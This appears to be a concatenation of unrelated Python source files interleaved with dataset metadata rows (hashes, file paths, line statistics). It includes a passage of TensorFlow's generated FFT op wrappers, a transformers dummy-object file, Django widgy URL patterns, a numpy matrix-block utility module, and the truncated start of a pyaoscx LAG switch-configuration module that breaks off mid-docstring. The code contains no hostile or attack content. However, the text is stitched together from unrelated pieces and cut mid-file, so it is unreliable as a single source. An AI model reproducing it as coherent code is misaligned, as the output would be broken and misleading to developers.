_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.float32)
fft_length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
_inputs_flat = [input, fft_length]
_attrs = None
_result = _execute.execute(b"RFFT", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=_ctx, name=name)
_execute.record_gradient(
"RFFT", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def rfft2d(input, fft_length, name=None):
r"""2D real-valued fast Fourier transform.
Computes the 2-dimensional discrete Fourier transform of a real-valued signal
over the inner-most 2 dimensions of `input`.
Since the DFT of a real signal is Hermitian-symmetric, `RFFT2D` only returns the
`fft_length / 2 + 1` unique components of the FFT for the inner-most dimension
of `output`: the zero-frequency term, followed by the `fft_length / 2`
positive-frequency terms.
Along each axis `RFFT2D` is computed on, if `fft_length` is smaller than the
corresponding dimension of `input`, the dimension is cropped. If it is larger,
the dimension is padded with zeros.
Args:
input: A `Tensor` of type `float32`. A float32 tensor.
fft_length: A `Tensor` of type `int32`.
An int32 tensor of shape [2]. The FFT length for each dimension.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
A complex64 tensor of the same rank as `input`. The inner-most 2
dimensions of `input` are replaced with their 2D Fourier transform. The
inner-most dimension contains `fft_length / 2 + 1` unique frequency
components.
@compatibility(numpy)
Equivalent to np.fft.rfft2
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"RFFT2D", input=input, fft_length=fft_length, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.float32)
fft_length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
_inputs_flat = [input, fft_length]
_attrs = None
_result = _execute.execute(b"RFFT2D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"RFFT2D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def rfft3d(input, fft_length, name=None):
r"""3D real-valued fast Fourier transform.
Computes the 3-dimensional discrete Fourier transform of a real-valued signal
over the inner-most 3 dimensions of `input`.
Since the DFT of a real signal is Hermitian-symmetric, `RFFT3D` only returns the
`fft_length / 2 + 1` unique components of the FFT for the inner-most dimension
of `output`: the zero-frequency term, followed by the `fft_length / 2`
positive-frequency terms.
Along each axis `RFFT3D` is computed on, if `fft_length` is smaller than the
corresponding dimension of `input`, the dimension is cropped. If it is larger,
the dimension is padded with zeros.
Args:
input: A `Tensor` of type `float32`. A float32 tensor.
fft_length: A `Tensor` of type `int32`.
An int32 tensor of shape [3]. The FFT length for each dimension.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
A complex64 tensor of the same rank as `input`. The inner-most 3
dimensions of `input` are replaced with the their 3D Fourier transform. The
inner-most dimension contains `fft_length / 2 + 1` unique frequency
components.
@compatibility(numpy)
Equivalent to np.fft.rfftn with 3 dimensions.
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"RFFT3D", input=input, fft_length=fft_length, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.float32)
fft_length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
_inputs_flat = [input, fft_length]
_attrs = None
_result = _execute.execute(b"RFFT3D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"RFFT3D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "BatchFFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use FFT"
# }
# }
# op {
# name: "BatchFFT2D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use FFT2D"
# }
# }
# op {
# name: "BatchFFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use FFT3D"
# }
# }
# op {
# name: "BatchIFFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use IFFT"
# }
# }
# op {
# name: "BatchIFFT2D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use IFFT2D"
# }
# }
# op {
# name: "BatchIFFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# deprecation {
# version: 15
# explanation: "Use IFFT3D"
# }
# }
# op {
# name: "FFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "FFT2D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "FFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "IFFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "IFFT2D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "IFFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "IRFFT"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_FLOAT
# }
# }
# op {
# name: "IRFFT2D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_FLOAT
# }
# }
# op {
# name: "IRFFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_FLOAT
# }
# }
# op {
# name: "RFFT"
# input_arg {
# name: "input"
# type: DT_FLOAT
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "RFFT2D"
# input_arg {
# name: "input"
# type: DT_FLOAT
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "RFFT3D"
# input_arg {
# name: "input"
# type: DT_FLOAT
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n.\n\010BatchFFT\022\t\n\005input\030\010\032\n\n\006output\030\010B\013\010\017\022\007Use FFT\n2\n\nBatchFFT2D\022\t\n\005input\030\010\032\n\n\006output\030\010B\r\010\017\022\tUse FFT2D\n2\n\nBatchFFT3D\022\t\n\005input\030\010\032\n\n\006output\030\010B\r\010\017\022\tUse FFT3D\n0\n\tBatchIFFT\022\t\n\005input\030\010\032\n\n\006output\030\010B\014\010\017\022\010Use IFFT\n4\n\013BatchIFFT2D\022\t\n\005input\030\010\032\n\n\006output\030\010B\016\010\017\022\nUse IFFT2D\n4\n\013BatchIFFT3D\022\t\n\005input\030\010\032\n\n\006output\030\010B\016\010\017\022\nUse IFFT3D\n\034\n\003FFT\022\t\n\005input\030\010\032\n\n\006output\030\010\n\036\n\005FFT2D\022\t\n\005input\030\010\032\n\n\006output\030\010\n\036\n\005FFT3D\022\t\n\005input\030\010\032\n\n\006output\030\010\n\035\n\004IFFT\022\t\n\005input\030\010\032\n\n\006output\030\010\n\037\n\006IFFT2D\022\t\n\005input\030\010\032\n\n\006output\030\010\n\037\n\006IFFT3D\022\t\n\005input\030\010\032\n\n\006output\030\010\n.\n\005IRFFT\022\t\n\005input\030\010\022\016\n\nfft_length\030\003\032\n\n\006output\030\001\n0\n\007IRFFT2D\022\t\n\005input\030\010\022\016\n\nfft_length\030\003\032\n\n\006output\030\001\n0\n\007IRFFT3D\022\t\n\005input\030\010\022\016\n\nfft_length\030\003\032\n\n\006output\030\001\n-\n\004RFFT\022\t\n\005input\030\001\022\016\n\nfft_length\030\003\032\n\n\006output\030\010\n/\n\006RFFT2D\022\t\n\005input\030\001\022\016\n\nfft_length\030\003\032\n\n\006output\030\010\n/\n\006RFFT3D\022\t\n\005input\030\001\022\016\n\nfft_length\030\003\032\n\n\006output\030\010")
| 30.773414
| 1,598
| 0.669808
| 4,228
| 30,558
| 4.596026
| 0.05842
| 0.038905
| 0.019452
| 0.028098
| 0.917765
| 0.895533
| 0.888431
| 0.874743
| 0.869802
| 0.861208
| 0
| 0.047315
| 0.221219
| 30,558
| 992
| 1,599
| 30.804435
| 0.769224
| 0.489692
| 0
| 0.702997
| 1
| 0.002725
| 0.131262
| 0.105771
| 0
| 0
| 0
| 0.006048
| 0
| 1
| 0.051771
| false
| 0
| 0.029973
| 0
| 0.133515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6a92c8dc275fed84de7c67abcc26cb2edfa0ed88
| 1,108
|
py
|
Python
|
src/transformers/utils/dummy_timm_and_vision_objects.py
|
HimashiRathnayake/adapter-transformers
|
d9c06ecbf4aaa33756e848b8fc5b3ec65f5ff4f4
|
[
"Apache-2.0"
] | 50,404
|
2019-09-26T09:55:55.000Z
|
2022-03-31T23:07:49.000Z
|
src/transformers/utils/dummy_timm_and_vision_objects.py
|
HimashiRathnayake/adapter-transformers
|
d9c06ecbf4aaa33756e848b8fc5b3ec65f5ff4f4
|
[
"Apache-2.0"
] | 13,179
|
2019-09-26T10:10:57.000Z
|
2022-03-31T23:17:08.000Z
|
src/transformers/utils/dummy_timm_and_vision_objects.py
|
HimashiRathnayake/adapter-transformers
|
d9c06ecbf4aaa33756e848b8fc5b3ec65f5ff4f4
|
[
"Apache-2.0"
] | 13,337
|
2019-09-26T10:49:38.000Z
|
2022-03-31T23:06:17.000Z
|
# This file is autogenerated by the command `make fix-copies`, do not edit.
from ..file_utils import requires_backends
DETR_PRETRAINED_MODEL_ARCHIVE_LIST = None
class DetrForObjectDetection:
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
@classmethod
def from_pretrained(cls, *args, **kwargs):
requires_backends(cls, ["timm", "vision"])
class DetrForSegmentation:
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
@classmethod
def from_pretrained(cls, *args, **kwargs):
requires_backends(cls, ["timm", "vision"])
class DetrModel:
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
@classmethod
def from_pretrained(cls, *args, **kwargs):
requires_backends(cls, ["timm", "vision"])
class DetrPreTrainedModel:
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
@classmethod
def from_pretrained(cls, *args, **kwargs):
requires_backends(cls, ["timm", "vision"])
| 26.380952
| 75
| 0.661552
| 121
| 1,108
| 5.77686
| 0.31405
| 0.206009
| 0.206009
| 0.297568
| 0.713877
| 0.713877
| 0.713877
| 0.713877
| 0.713877
| 0.713877
| 0
| 0
| 0.193141
| 1,108
| 41
| 76
| 27.02439
| 0.781879
| 0.065884
| 0
| 0.769231
| 1
| 0
| 0.077444
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.038462
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
6aa05070c2174c24912720d0bab41ed3e6c0b6fa
| 1,047
|
py
|
Python
|
widgy/contrib/widgy_mezzanine/urls.py
|
isopets/django-widgy
|
de6920b2b25699888eee1cc9b4d28f2aa5905ce1
|
[
"Apache-2.0"
] | 168
|
2015-01-04T17:22:45.000Z
|
2022-01-28T09:53:35.000Z
|
widgy/contrib/widgy_mezzanine/urls.py
|
isopets/django-widgy
|
de6920b2b25699888eee1cc9b4d28f2aa5905ce1
|
[
"Apache-2.0"
] | 82
|
2015-01-09T18:14:32.000Z
|
2020-10-08T18:13:07.000Z
|
widgy/contrib/widgy_mezzanine/urls.py
|
isopets/django-widgy
|
de6920b2b25699888eee1cc9b4d28f2aa5905ce1
|
[
"Apache-2.0"
] | 61
|
2015-01-09T17:16:51.000Z
|
2021-07-03T08:52:27.000Z
|
from django.conf.urls import url
import widgy.contrib.widgy_mezzanine.views
urlpatterns = [
url('^preview/(?P<node_pk>[^/]+)/$',
widgy.contrib.widgy_mezzanine.views.preview,
name='widgy.contrib.widgy_mezzanine.views.preview'), # undelete
url('^preview-page/(?P<node_pk>[^/]+)/(?P<page_pk>[^/]+)/$',
widgy.contrib.widgy_mezzanine.views.preview,
name='widgy.contrib.widgy_mezzanine.views.preview'),
url('^form-page/(?P<form_node_pk>[^/]*)/(?P<page_pk>[^/]+)/$',
widgy.contrib.widgy_mezzanine.views.handle_form,
name='widgy.contrib.widgy_mezzanine.views.handle_form'),
# deprecated urls for backwards compatibility with slug reversing
url('^preview/(?P<node_pk>[^/]+)/(?P<slug>.+)/$',
widgy.contrib.widgy_mezzanine.views.preview,
name='widgy.contrib.widgy_mezzanine.views.preview'),
url('^form/(?P<form_node_pk>[^/]*)/(?P<slug>.+)/$',
widgy.contrib.widgy_mezzanine.views.handle_form,
name='widgy.contrib.widgy_mezzanine.views.handle_form'),
]
| 45.521739
| 72
| 0.662846
| 130
| 1,047
| 5.153846
| 0.207692
| 0.197015
| 0.279104
| 0.426866
| 0.810448
| 0.710448
| 0.710448
| 0.710448
| 0.710448
| 0.677612
| 0
| 0
| 0.136581
| 1,047
| 22
| 73
| 47.590909
| 0.74115
| 0.068768
| 0
| 0.526316
| 0
| 0
| 0.458848
| 0.458848
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.105263
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6aa0538a45756e66965a5ed6a592860f1086a25c
| 13,137
|
py
|
Python
|
utils/base.py
|
newTypeGeek/Network-Reconstruction
|
135a07cc304dac0666a9d11d3548aee7a669eaad
|
[
"MIT"
] | 3
|
2020-10-15T09:33:59.000Z
|
2022-03-12T11:22:04.000Z
|
utils/base.py
|
newTypeGeek/Network-Reconstruction
|
135a07cc304dac0666a9d11d3548aee7a669eaad
|
[
"MIT"
] | null | null | null |
utils/base.py
|
newTypeGeek/Network-Reconstruction
|
135a07cc304dac0666a9d11d3548aee7a669eaad
|
[
"MIT"
] | 1
|
2020-10-15T09:38:20.000Z
|
2020-10-15T09:38:20.000Z
|
#!/usr/bin/env python3
import numpy as np
def eigen_values(M):
'''
Compute the eigenvalues of a general square matrix M
Arguments:
1. M: A general square matrix
Returns:
1. eig_vals: Eigen-values of matrix M
'''
assert type(M) == np.ndarray, "M must be of type 'numpy.ndarray'"
assert M.size > 0, "M must not be empty"
assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
size = M.shape
assert len(size) == 2, "M must be 2D shape"
assert size[0] == size[1], "M must be a square matrix"
eig_vals, _ = np.linalg.eig(M)
return eig_vals
def inverse(M, tol=1e5):
'''
Compute the inverse of a square matrix M
Arguments:
1. M: A general square matrix
2. tol: Tolerance value of condition number (default: 1e5)
Returns:
1. M_inv: Inverse of the matrix M
'''
assert type(M) == np.ndarray, "M must be of type 'numpy.ndarray'"
assert M.size > 0, "M must not be empty"
assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
size = M.shape
assert len(size) == 2, "M must be 2D shape"
assert size[0] == size[1], "M must be a square matrix"
assert (type(tol) == int or type(tol) == float) and np.isfinite(tol) and tol >= 0, "tol must be a non-negative number"
cond_num = np.linalg.cond(M)
M_inv = None
if cond_num < tol:
M_inv = np.linalg.inv(M)
else:
print("M is highly singular")
return M_inv
def off_diag_upper(M):
'''
Extract the off-diagonal elements (upper triangle) of a square matrix
Arguments:
1. M: input matrix
Returns:
1. off: off-diagonal elements (upper triangle) of input matrix M
'''
assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
assert M.size > 0, "M must not be empty"
assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
size = M.shape
assert len(size) == 2, "M must be 2D shape"
assert size[0] == size[1], "M must be a square matrix"
off_upper = M[np.triu(np.ones(size), 1) == 1]
return off_upper
def index_recover(n):
'''
Recover the original row and column indices of the
flatten upper triangle vector using triu method (see off_diag_upper)
Arguments:
1. n: The original matrix size
Returns:
1. row: Row indices
2. col: Column indices
'''
assert type(n) == int and n > 0, "n must be a positive integer"
v_size = int(n*(n-1)/2)
# Recover the row index and column index
row = np.zeros((v_size,))
col = np.zeros((v_size,))
for i in range(n-1):
bin_size = n-1-i
if i == 0:
start = 0
end = bin_size
else:
start = end
end = start + bin_size
row[start:end] = i * np.ones((bin_size,))
col[start:end] = sorted(np.arange(n-1, i, -1))
return row, col
def block_diag_up(M, measure_id):
'''
Extract the block matrix from matrix M with row and column
correspond to measured nodes
Arguments:
1. M: The original square matrix M
2. measure_id: Measured node indices of the original matrix M
Returns:
1. B: Block matrix with elements equal to the original matrix
formed among the measure nodes
'''
assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
assert M.size > 0, "M must not be empty"
assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
size = M.shape
assert len(size) == 2, "M must be 2D shape"
assert size[0] == size[1], "M must be a square matrix"
assert type(measure_id) == np.ndarray, "measure_id must be of type 'np.ndarray'"
assert measure_id.size > 0, "measure_id must not be empty"
assert measure_id.dtype == int, "measure_id must be of dtype 'int'"
assert len(measure_id.shape) == 1, "measure_id must be 1D shape"
assert (measure_id >= 0).all(), "measure_id elements must be non-negative integers"
assert np.max(measure_id) < size[0], "measure_id elements must be smaller than the input matrix size"
n = len(measure_id)
B = np.zeros((n, n))
if np.allclose(M, M.T):
for i in range(n):
B[i, i] = M[measure_id[i], measure_id[i]]
for j in range(i+1, n):
B[i, j] = M[measure_id[i], measure_id[j]]
B[j, i] = B[i, j]
else:
for i in range(n):
for j in range(n):
B[i, j] = M[measure_id[i], measure_id[j]]
return B
def block_diag_low(M, hidden_id):
'''
Extract the block matrix from matrix M with row and column
correspond to hidden nodes
Arguments:
1. M: The original square matrix M
2. hidden_id: Hidden node indices of the original matrix M
Returns:
1. B: Block matrix with elements equal to the original matrix
formed among the hidden nodes
'''
assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
assert M.size > 0, "M must not be empty"
assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
size = M.shape
assert len(size) == 2, "M must be 2D shape"
assert size[0] == size[1], "M must be a square matrix"
assert type(hidden_id) == np.ndarray, "hidden_id must be of type 'np.ndarray'"
assert hidden_id.size > 0, "hidden_id must not be empty"
assert hidden_id.dtype == int, "hidden_id must be of dtype 'int'"
assert len(hidden_id.shape) == 1, "hidden_id must be 1D shape"
assert (hidden_id >= 0).all(), "hidden_id elements must be non-negative integers"
assert np.max(hidden_id) < size[0], "hidden_id elements must be smaller than the input matrix size"
n = len(hidden_id)
B = np.zeros((n, n))
if np.allclose(M, M.T):
for i in range(n):
B[i, i] = M[hidden_id[i], hidden_id[i]]
for j in range(i+1, n):
B[i, j] = M[hidden_id[i], hidden_id[j]]
B[j, i] = B[i, j]
else:
for i in range(n):
for j in range(n):
B[i, j] = M[hidden_id[i], hidden_id[j]]
return B
def block_off_up(M, measure_id, hidden_id):
'''
Extract the block matrix from matrix M with row corresponds to measured nodes
and column corresponds to hidden nodes
Arguments:
1. M: The original square matrix M
2. measure_id: Measured node indices of the original matrix M
3. hidden_id: Hidden node indices of the original matrix M
Returns:
1. B: Block matrix with elements equal to the original matrix
formed with row corresponds to measured nodes and column
corresponds to hidden nodes
'''
assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
assert M.size > 0, "M must not be empty"
assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
size = M.shape
assert len(size) == 2, "M must be 2D shape"
assert size[0] == size[1], "M must be a square matrix"
assert type(measure_id) == np.ndarray, "measure_id must be of type 'np.ndarray'"
assert measure_id.size > 0, "measure_id must not be empty"
assert measure_id.dtype == int, "measure_id must be of dtype 'int'"
assert len(measure_id.shape) == 1, "measure_id must be 1D shape"
assert (measure_id >= 0).all(), "measure_id elements must be non-negative integers"
assert np.max(measure_id) < size[0], "measure_id elements must be smaller than the input matrix size"
assert type(hidden_id) == np.ndarray, "hidden_id must be of type 'np.ndarray'"
assert hidden_id.size > 0, "hidden_id must not be empty"
assert hidden_id.dtype == int, "hidden_id must be of dtype 'int'"
assert len(hidden_id.shape) == 1, "hidden_id must be 1D shape"
assert (hidden_id >= 0).all(), "hidden_id elements must be non-negative integers"
assert np.max(hidden_id) < size[0], "hidden_id elements must be smaller than the input matrix size"
n_m = len(measure_id)
n_h = len(hidden_id)
assert size[0] == (n_m + n_h), "Total number of elements in measure_id and hidden_id does not equal the number of rows of M"
all_id = np.unique(np.concatenate((measure_id, hidden_id)))
assert len(all_id) == size[0], "mesure_id and hidden_id contain common elements"
B = np.zeros((n_m, n_h))
for i in range(n_m):
for j in range(n_h):
B[i, j] = M[measure_id[i], hidden_id[j]]
return B
def block_off_low(M, measure_id, hidden_id):
'''
Extract the block matrix from matrix M with row corresponds to hidden nodes
and column corresponds to measured nodes
Arguments:
1. M: The original square matrix M
2. measure_id: Measured node indices of the original matrix M
3. hidden_id: Hidden node indices of the original matrix M
Returns:
1. B: Block matrix with elements equal to the original matrix
formed with row corresponds to hidden nodes and column
corresponds to column nodes
'''
assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
assert M.size > 0, "M must not be empty"
assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
size = M.shape
assert len(size) == 2, "M must be 2D shape"
assert size[0] == size[1], "M must be a square matrix"
assert type(measure_id) == np.ndarray, "measure_id must be of type 'np.ndarray'"
assert measure_id.size > 0, "measure_id must not be empty"
assert measure_id.dtype == int, "measure_id must be of dtype 'int'"
assert len(measure_id.shape) == 1, "measure_id must be 1D shape"
assert (measure_id >= 0).all(), "measure_id elements must be non-negative integers"
assert np.max(measure_id) < size[0], "measure_id elements must be smaller than the input matrix size"
assert type(hidden_id) == np.ndarray, "hidden_id must be of type 'np.ndarray'"
assert hidden_id.size > 0, "hidden_id must not be empty"
assert hidden_id.dtype == int, "hidden_id must be of dtype 'int'"
assert len(hidden_id.shape) == 1, "hidden_id must be 1D shape"
assert (hidden_id >= 0).all(), "hidden_id elements must be non-negative integers"
assert np.max(hidden_id) < size[0], "hidden_id elements must be smaller than the input matrix size"
n_m = len(measure_id)
n_h = len(hidden_id)
assert size[0] == (n_m + n_h), "Total number of elements in measure_id and hidden_id does not equal the number of rows of M"
all_id = np.unique(np.concatenate((measure_id, hidden_id)))
assert len(all_id) == size[0], "mesure_id and hidden_id contain common elements"
B = np.zeros((n_h, n_m))
for i in range(n_h):
for j in range(n_m):
B[i, j] = M[hidden_id[i], measure_id[j]]
return B
def matrix_rearrange(M, measure_id, hidden_id):
'''
Re-arrange the square matrix according to which nodes
are measured nodes / hidden nodes
Arguments:
1. M: The original square matrix M
2. measure_id: Measured node indices of the original matrix M
3. hidden_id: Hidden node indices of the original matrix M
Returns:
1. M_perm: The permutated matrix and would be in
this format:
| M_m M_u |
| M_l M_h |
2. M_m: Block matrix with elements equal to the original matrix
formed among the measure nodes
3. M_h: Block matrix with elements equal to the original matrix
formed among the hidden nodes
4. M_u: Block matrix with elements equal to the original matrix
formed between measure nodes and hidden nodes
5. M_l: Block matrix with elements equal to the original matrix
formed between measure nodes and hidden nodes
'''
#NOTE: The functions named block_ below consists of assertion checking
# So we do not intend to add assertions in this function
M_m = block_diag_up(M, measure_id)
M_h = block_diag_low(M, hidden_id)
M_u = block_off_up(M, measure_id, hidden_id)
if np.allclose(M, M.T):
M_l = M_u.T
else:
M_l = block_off_low(M, measure_id, hidden_id)
# Combine all 4 block matrices
M_perm = np.block([[M_m, M_u], [M_l, M_h]])
return M_perm, M_m, M_u, M_l, M_h
| 35.991781
| 128
| 0.6248
| 2,153
| 13,137
| 3.71203
| 0.080353
| 0.0503
| 0.030656
| 0.015766
| 0.839965
| 0.830205
| 0.806557
| 0.803929
| 0.789039
| 0.789039
| 0
| 0.012678
| 0.273502
| 13,137
| 364
| 129
| 36.090659
| 0.824707
| 0.273502
| 0
| 0.694915
| 0
| 0
| 0.323072
| 0
| 0
| 0
| 0
| 0
| 0.474576
| 1
| 0.050847
| false
| 0
| 0.00565
| 0
| 0.107345
| 0.00565
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6aa08e65b26862080cd763c69346c708f2d566b6
| 23,306
|
py
|
Python
|
pyaoscx/lag.py
|
blag/pyaoscx
|
8af1b5c5c6fb71de0c2eed67c6930465b73872d8
|
[
"Apache-2.0"
] | null | null | null |
pyaoscx/lag.py
|
blag/pyaoscx
|
8af1b5c5c6fb71de0c2eed67c6930465b73872d8
|
[
"Apache-2.0"
] | null | null | null |
pyaoscx/lag.py
|
blag/pyaoscx
|
8af1b5c5c6fb71de0c2eed67c6930465b73872d8
|
[
"Apache-2.0"
] | null | null | null |
# (C) Copyright 2019-2020 Hewlett Packard Enterprise Development LP.
# Apache License 2.0
from pyaoscx import common_ops
from pyaoscx import port
from pyaoscx import interface
import json
import re
import logging
def create_l2_lag_interface(name, phys_ports, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
vlan_ids_list=[], desc=None, admin_state="up", **kwargs):
"""
Perform a POST call to create a Port table entry for L2 LAG interface.
:param name: Alphanumeric name of LAG Port
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
:param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
:param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
:param vlan_ids_list: Optional list of integer VLAN IDs to add as trunk VLANS. Defaults to empty list if not specified.
:param desc: Optional description for the interface. Defaults to nothing if not specified.
:param admin_state: Optional administratively-configured state of the port.
Defaults to "up" if not specified
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
if kwargs["url"].endswith("/v1/"):
return _create_l2_lag_interface_v1(name, phys_ports, lacp_mode, mc_lag, fallback_enabled, vlan_ids_list, desc,
admin_state, **kwargs)
else: # Updated else for when version is v10.04
success = _create_l2_lag_interface(name, phys_ports, lacp_mode, mc_lag, fallback_enabled, vlan_ids_list, desc,
admin_state, **kwargs)
if mc_lag or fallback_enabled:
return success and _update_l2_lag_interface(name, mc_lag, fallback_enabled, **kwargs)
else:
return success
def _create_l2_lag_interface_v1(name, phys_ports, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
vlan_ids_list=[], desc=None, admin_state="up", **kwargs):
"""
Perform a POST call to create a Port table entry for L2 LAG interface.
:param name: Alphanumeric name of LAG Port
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
:param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
:param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
:param vlan_ids_list: Optional list of integer VLAN IDs to add as trunk VLANS. Defaults to empty list if not specified.
